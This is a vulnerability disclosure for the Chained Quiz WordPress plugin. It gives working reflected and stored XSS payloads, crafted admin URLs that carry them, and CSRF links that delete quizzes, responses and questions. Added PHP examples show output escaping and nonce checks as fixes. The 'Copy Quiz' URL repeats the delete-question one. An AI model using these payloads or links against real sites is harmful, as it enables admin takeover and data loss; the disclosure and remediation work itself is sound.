CVE-2022-4220: WP plugin Chained Quiz multiple vulnerabilities

The Chained Quiz plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.2.4. This is due to missing nonce validation on the list_questions() function. This makes it possible for unauthenticated attackers to delete questions from quizzes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.


WordPress plugin Chained Quiz <= 1.3.2 multiple vulnerabilities

Author: Muhammad Zeeshan (Xib3rR4dAr)
Date: November 24, 2022

XSS

Description:
Multiple endpoints are vulnerable to XSS. When a logged-in admin visits a URL shared by an attacker, the XSS triggers, which can be exploited to add a new admin user to the website. The plugin passes the values through sanitize_text_field (input filtering) where esc_attr (output escaping for the attribute context) should have been used.

Vulnerable Files:

chained-quiz/controllers/completed.php
chained-quiz/views/completed.html.php
and more

Payload:

" onmouseover=alert(1) style=position:absolute;width:100%;height:100%;top:0;left:0; a

URL Encoded Payload:

%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a

PoC:
While logged in as admin, visiting any of the following crafted URLs will trigger the XSS (the payload moves from one filter parameter to the next):

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=&datef=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&dnf=&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&date=&datef=&points=&pointsf=&result_id=0&source_url=

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&datef=&points=&pointsf=&result_id=0&source_url=

Similarly, other endpoints in the plugin are vulnerable to admin stored XSS even when DISALLOW_UNFILTERED_HTML is set to true. Some of them are:

  • Visit the Social Sharing page (http://example.com/wp-admin/admin.php?page=chainedquiz_social_sharing) as admin and set the Facebook App ID input to: " onclick=alert(1) a

  • Visit the Integrations page as admin and set the MailChimp API Key to: " onclick=alert(1) a
    The XSS triggers when the input box is clicked, or when the page is hovered over, depending on the payload used.

    POST /wp-admin/admin.php?page=chainedquiz_social_sharing … facebook_appid=" onclick=alert(1) a

    POST /wp-admin/admin.php?page=chainedquiz_integrations&tab=mailchimp … api_key=someapikey" onclick=alert(1) a
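The difference between input filtering and output escaping is the whole bug, so here is an added example (not plugin code) that renders a listing-page filter box both ways and lists the attributes a parser actually sees. Assumptions: sanitize_text_field is modelled as strip_tags plus whitespace collapsing, and esc_attr as htmlspecialchars with ENT_QUOTES, the encoding WordPress builds on.

```php
<?php
// Added example, not Chained Quiz code. Approximations (assumptions):
// sanitize_text_field() ~ strip_tags() + whitespace collapsing;
// esc_attr()            ~ htmlspecialchars() with ENT_QUOTES.
function approx_sanitize_text_field( string $s ): string {
    return trim( preg_replace( '/\s+/', ' ', strip_tags( $s ) ) );
}

function approx_esc_attr( string $s ): string {
    return htmlspecialchars( $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
}

// Renders a filter box the way the listing page does: the request value lands
// inside a double-quoted value="" attribute, the context the advisory's payload targets.
function render_filter_input( string $name, string $value, bool $escape_output ): string {
    $value = approx_sanitize_text_field( $value );   // what the plugin did
    if ( $escape_output ) {
        $value = approx_esc_attr( $value );           // what it should do as well
    }
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Check: parse the rendered tag and return the attribute names a browser would see.
// Anything beyond type/name/value means the value broke out of its attribute.
function attribute_names( string $html ): array {
    $dom = new DOMDocument();
    @$dom->loadHTML( $html );
    $input = $dom->getElementsByTagName( 'input' )->item( 0 );
    $names = array();
    foreach ( $input->attributes as $attr ) {
        $names[] = $attr->name;
    }
    return $names;
}

// Constructed input: the advisory's payload, as it arrives after URL decoding.
$payload = '" onmouseover=alert(1) style=position:absolute;width:100%;height:100%;top:0;left:0; a';

// strip_tags() sees no '<', so the quote-closing payload survives untouched and
// onmouseover/style become live attributes of the input element.
echo "sanitize only:       ", implode( ' ', attribute_names( render_filter_input( 'datef', $payload, false ) ) ), "\n";

// With esc_attr() the quote is encoded, so only type/name/value remain and the
// whole payload is inert text inside value="".
echo "sanitize + esc_attr: ", implode( ' ', attribute_names( render_filter_input( 'datef', $payload, true ) ) ), "\n";
```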

CSRF

Delete a quiz:

/wp-admin/admin.php?page=chained_quizzes&del=1&id=2

Delete submitted responses:

/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&offset=0&ob=tC.id&dir=desc&del=5

Delete a question from a quiz:

/wp-admin/admin.php?page=chainedquiz_questions&quiz_id=1&del=1&id=1

Copy Quiz:

/wp-admin/admin.php?page=chainedquiz_questions&quiz_id=1&del=1&id=1
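The CVE text attributes the CSRF to missing nonce validation, so as an added example (not the plugin's own code) this is the WordPress nonce-plus-capability pattern applied to the delete-question action above. It assumes it runs inside WordPress (wp_nonce_url, check_admin_referer, current_user_can and $wpdb are core APIs); the function names and the table name are placeholders, not the plugin's.

```php
<?php
// Added example, not Chained Quiz code. Assumes WordPress core is loaded.
// Function names and the table name are placeholders.

// Builds the delete link the admin page should render: the nonce is bound to one
// action and one question id, so a token seen for one row cannot be replayed on another.
function cq_example_delete_question_url( int $quiz_id, int $question_id ): string {
    $url = admin_url( 'admin.php?page=chainedquiz_questions&quiz_id=' . $quiz_id
                      . '&del=1&id=' . $question_id );
    return wp_nonce_url( $url, 'cq_delete_question_' . $question_id );
}

// Handles the request. Order matters: authorisation first, then the CSRF check,
// then the state change, then a redirect that drops the action parameters.
function cq_example_handle_delete_question(): void {
    global $wpdb;
    if ( empty( $_GET['del'] ) || ! isset( $_GET['id'] ) ) {
        return;
    }
    $question_id = (int) $_GET['id'];

    // Capability check: a logged-in user without this capability is refused
    // regardless of whether the nonce is valid.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to delete questions.', '', array( 'response' => 403 ) );
    }

    // CSRF check: a link forged on another origin carries no valid _wpnonce for this
    // action/id pair, so check_admin_referer() stops the request here.
    check_admin_referer( 'cq_delete_question_' . $question_id );

    $wpdb->delete(
        $wpdb->prefix . 'EXAMPLE_chained_questions',   // placeholder table name
        array( 'id' => $question_id ),
        array( '%d' )
    );

    // Strip del/id/_wpnonce so a page reload cannot repeat the deletion.
    wp_safe_redirect( remove_query_arg( array( 'del', 'id', '_wpnonce' ) ) );
    exit;
}
```

A GET that mutates state is itself the weak point; the same checks apply unchanged if the action is moved to a POST form with wp_nonce_field().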

Related news

CVE-2022-4213: Vulnerability Advisories Continued - Wordfence

The Chained Quiz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dn' parameter on the 'chainedquiz_list' page in versions up to, and including, 1.3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
